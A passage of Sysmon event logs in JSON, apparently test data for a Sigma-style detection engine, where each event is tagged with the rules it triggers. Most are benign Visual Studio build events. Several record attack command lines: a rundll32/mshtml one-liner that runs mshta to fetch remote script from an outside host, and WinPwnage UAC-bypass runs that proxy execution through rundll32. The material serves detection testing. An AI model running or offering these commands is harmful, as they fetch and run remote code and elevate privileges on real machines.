13:21:14.395"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429142,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425472Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.396","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp19546d957b6e4d15b83f93a323d5f087.rsp","UtcTime":"2021-01-26 13:21:14.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429143,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425565Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.396","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp19546d957b6e4d15b83f93a323d5f087.rsp","UtcTime":"2021-01-26 13:21:14.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429144,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.425664Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.826","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.write.1.tlog","UtcTime":"2021-01-26 13:21:14.852"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429148,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.871509Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.826","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.write.1.tlog","UtcTime":"2021-01-26 13:21:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429149,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.871745Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.818","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.read.1.tlog","UtcTime":"2021-01-26 13:21:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429150,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.871980Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.818","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.read.1.tlog","UtcTime":"2021-01-26 13:21:14.854"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429151,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.872190Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:15:06.578","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.command.1.tlog","UtcTime":"2021-01-26 13:21:14.855"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429152,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:14.872564Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.229","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp","UtcTime":"2021-01-26 13:21:23.229"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429153,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:23.229964Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.302","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp","UtcTime":"2021-01-26 13:21:23.302"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429154,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:23.303639Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.305","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp","UtcTime":"2021-01-26 13:21:23.305"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429155,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:23.305903Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2021-01-26 13:21:33.196","Image":"C:\\windows\\system32\\mmc.exe","ProcessGuid":"00247C92-EC0A-600F-0000-00100AEFCC2C","ProcessId":22932,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\Downloads\\prebuildevent_visual_studio.evtx","UtcTime":"2021-01-26 13:21:33.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429156,"Execution_attributes":{"ProcessID":5272,"ThreadID":6060},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2021-01-26T13:21:33.197967Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe /C rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-39CC-5CE3-0000-002096C70000","LogonId":"0xc796","ParentCommandLine":"\"cmd.exe\" /s /k pushd \"C:\\Users\\IEUser\\Desktop\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-4F8A-5CE3-0000-0010C5BB4800","ParentProcessId":3548,"ProcessGuid":"365ABB72-1A29-5CE4-0000-001054E32101","ProcessId":1532,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-21 15:32:57.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4125,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-21T15:32:57.286254Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-39CC-5CE3-0000-002096C70000","LogonId":"0xc796","ParentCommandLine":"cmd.exe /C rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WScript.Shell\").run(\"mshta https://hotelesms.com/talsk.txt\",0,true);","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-1A29-5CE4-0000-001054E32101","ParentProcessId":1532,"ProcessGuid":"365ABB72-1A29-5CE4-0000-00107BE42101","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-21 15:32:57.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4126,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-21T15:32:57.286254Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-12 13:30:46.181","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-1FF8-5CD8-0000-00102A342000","ProcessId":1332,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\ieframe.url","UtcTime":"2019-05-12 13:30:46.181"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16387,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:30:46.181756Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" ieframe.dll,OpenURL c:\\users\\ieuser\\appdata\\local\\temp\\ieframe.url","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"python winpwnage.py -u execute -i 9 -p c:\\Windows\\system32\\cmd.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-1FF8-5CD8-0000-00102A342000","ParentProcessId":1332,"ProcessGuid":"365ABB72-2006-5CD8-0000-0010A2862300","ProcessId":2960,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:30:46.213"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16388,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:30:46.400506Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-208A-5CD8-0000-0010119B2400","ProcessId":3560,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:32:58.167"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16390,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:32:58.167195Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-20B1-5CD8-0000-001064D62400","ProcessId":1844,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:33:37.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16391,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:33:37.078801Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-20C7-5CD8-0000-001021022500","ProcessId":1416,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:33:59.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16392,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:33:59.743077Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-21B8-5CD8-0000-0010BADE2600","ProcessId":3856,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 